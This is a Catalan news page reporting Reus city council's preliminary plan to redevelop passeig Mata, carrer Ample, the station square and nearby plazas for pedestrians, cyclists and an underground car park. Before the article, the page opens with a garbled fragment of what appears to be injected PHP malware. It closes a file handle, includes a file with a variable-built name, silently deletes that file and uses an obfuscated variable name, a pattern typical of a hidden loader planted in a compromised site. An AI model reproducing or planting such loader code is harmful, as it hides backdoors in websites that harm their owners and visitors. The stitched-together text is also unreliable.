");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La transformació de l’entorn del passeig Mata i el carrer Ample donarà continuïtat a l’eix central de Reus
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

La transformació de l’entorn del passeig Mata i el carrer Ample donarà continuïtat a l’eix central de Reus (27/07/2021)

L’Ajuntament de Reus disposa ja de l’avantprojecte d’urbanització de l’entorn del passeig Mata i el carrer Ample, i encarregarà pròximament els projectes executius que han de desenvolupar el document. Adjudicat a l’empresa Batlle i Roig Arquitectura SLP, l’avantprojecte aporta idees de transformació d’una peça clau per donar continuïtat a l’eix central de la ciutat, que enllaçarà el nord amb el centre i fins a la zona sud a l'entorn del Carrilet i Mas Iglesias.

L'alcalde de Reus, Carles Pellicer; la vicealcaldessa, Noemí Llauradó; la regidora d'Urbanisme i Mobilitat, Marina Berasategui i els arquitectes responsables de l'obra, han presentat avui el projecte, posant en valor la seva importància per continuar el traçat de l'eix central i la seva voluntat transformadora tant pel que fa a la mobilitat com a l'ordenació de l'espai públic, la millora de la connectivitat o la integració de l'espai. També ha assistit a la presentació el regidor i tinent d'alcalde Daniel Rubio.

La proposta d'actuació preveu donar el màxim protagonisme als vianants, dotant el 80% dels l’àmbit a la mobilitat a peu, mentre que el 20% està destinat a la mobilitat de vehicles. L’actual configuració destina un 45% als vianants i un 55% als vehicles.

L’avantprojecte aporta idees per millorar els espais públics d’aquesta zona del nord de la ciutat; reordenar els vials i les zones verdes; revisar la mobilitat; millorar la connectivitat de l’estació de trens amb el centre de Reus; i integrar els dos espais en el seu entorn. L’àmbit s’emmarca en el passeig de Mata (des del passeig de Sunyer fins a l’avinguda de l’Onze de Setembre i el carrer del General Moragues), la plaça de l’Estació i la seva connexió amb el carrer del Bisbe Borràs i avinguda del Segle XX, i finalment tot el carrer Ample incloent la plaça del Victor i la plaça del Pintor Fortuny.

Projectes executius

Una vegada definides les idees principals amb l’avantprojecte, l’Ajuntament encarregà pròximament la redacció del projecte executiu del carrer Ample, l’entorn i la plaça del Víctor; i de l’entorn i la plaça del Pintor Fortuny.

Amb els projectes executius i el pressupost tancat, el Govern de Reus té la intenció d’iniciar l’execució de les obres durant aquest mandat.

Principals actuacions

L’avantprojecte elaborat per Batlle i Roig aborda la transformació de l'àmbit d'estudi a l'entorn de 4 actuacions principals:

- La nova plaça de l'Estació, com a espai de benvinguda i trobada de reusencs i visitants.
- La transformació del Passeig Mata en un nou espai on el vianant i el ciclista són els protagonistes, i la construcció del nou aparcament soterrat.
- La pacificació del carrer Ample, donant continuïtat a l'eix cívic del carrer de Llovera i actuant també a la plaça del Víctor.
- L’actuació a la plaça Pintor Fortuny (Condesito) amb la Llibertat.

Carrer Ample

Per tal de garantir l’èxit en la pacificació del carrer és imprescindible analitzar la mobilitat en el seu context. Actualment el carrer Ample és una important via de comunicació sud-nord. És necessari replantejar el sentit de circulació del carrer, així com d’altres carrers propers per tal d’aconseguir desviar aquesta mobilitat sud-nord cap al passeig Sunyer o l’avinguda del Pintor Tapiró. D’aquesta manera, es pot assolir la volguda pacificació, doncs el carrer Ample es transformaria en un vial bàsicament veïnal.

Es planteja un model de pacificació ja experimentat amb èxit en espais on abans existia una gran afluència de trànsit. Es plantegen les línies bàsiques següents: canvi en la mobilitat del context per reduir el trànsit del carrer, inversió de la prioritat vianant-cotxe mitjançant plataforma única, reducció dràstica de l’estacionament en superfície, integració de l’arbrat existent, increment de la vegetació d’arbres i arbustos a nivell de terra, creació de punts de descans i lleure al llarg del carrer, i disposició de paviments podotàctils en favor d’una màxima inclusivitat.

Plaça del Víctor

La transformació de la Plaça Víctor ha de contribuir a la pacificació global del carrer Ample. L’objectiu de la proposta és definir la Plaça Víctor com un element articulador i com a punt de connexió amb el Centre Cívic Gregal. Per assegurar la relació amb la transformació del carrer Ample, tant pel carrer de Santa Helena i pel carrer Alt de Sant Josep (i carrer de Miró) es plantegen plataformes úniques per prioritzar l’accés i la mobilitat per als vianants des de la cruïlla amb el carrer de Joan Martell i fins el Carrer de Castellvell, on es pretén connectar amb el Centre Cívic Gregal i la plaça del Pintor Ferré Ravascall per mitjà d’un pas elevat.

Plaça del Pintor Fortuny

Els canvis en la mobilitat, juntament amb la transformació del carrer Ample permeten abordar l'àmbit de la plaça del Pintor Fortuny, amb la voluntat de transformar-la en un gran node cívic articulador de la continuïtat de l'eix sud-nord que s'origina a la plaça Mercadal. Igualment, permet millorar la relació amb la plaça de la Llibertat fins al punt de poder-se entendre com un sol espai continu.

Passeig Mata

La racionalització de l’espai dedicat a la circulació del vehicle privat, juntament amb la creació de l’aparcament soterrat permet abordar una profunda transformació de l’àmbit d’estudi per tal de configurar de manera efectiva un Passeig cívic que posi en relació l’eix del carrer Ample amb l’Estació de tren. L’eliminació de les dues rotondes intermèdies permet donar continuïtat al passeig en sentit est-oest.

Plaça de l’Estació

La plaça de l'Estació és, en realitat ,una gran aparcament en superfície que dona servei als usuaris del tren i als residents propers. El futur aparcament soterrat substitueix la funcionalitat d'estacionament de l'actual espai. Aquest fet permet pensar en una recuperació de l’espai públic per tal de configurar una veritable plaça de l'estació com a nou punt de benvinguda al municipi.

Nova xarxa de carril bici

La proposta preveu dotar bicicletes del seu propi espai segregat, que permeti reduir al mínim els conflictes derivats de la convivència amb vianants i altres vehicles. Amb la pacificació del carrer Ample i la incorporació d’un carril bici en el passeig Mata s’aconsegueix consolidar una xarxa bàsica de circulacions per bicicletes i vehicles de mobilitat personal que permetrà alimentar el barri i comunicar amb la resta de la ciutat: amb el centre a través del carrer Ample o el passeig Sunyer, o amb l’altra costat de les vies (el Passeig de la Boca de la Mina) través de l’avinguda del General Moragues i l’avinguda del Comerç. Per tal d’aconseguir una segregació efectiva del nou carril bici, aquest es coŀloca en una cota intermitja entre la vorera i la calçada que l’independitza d’aquestes dotant-lo d’un espai propi.

Aparcament subterrani

El futur aparcament soterrat ha de servir per reallotjar bona part de la dotació actual d’estacionament en superfície. Això suposarà la recuperació d’una important àrea d’espai públic que permet repensar la configuració actual i l’ordenació de tot l’àmbit i la seva mobilitat.

Font: Ajuntament de Reus

La transformació de l’entorn del passeig Mata i el carrer Ample donarà continuïtat a l’eix central de Reus

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona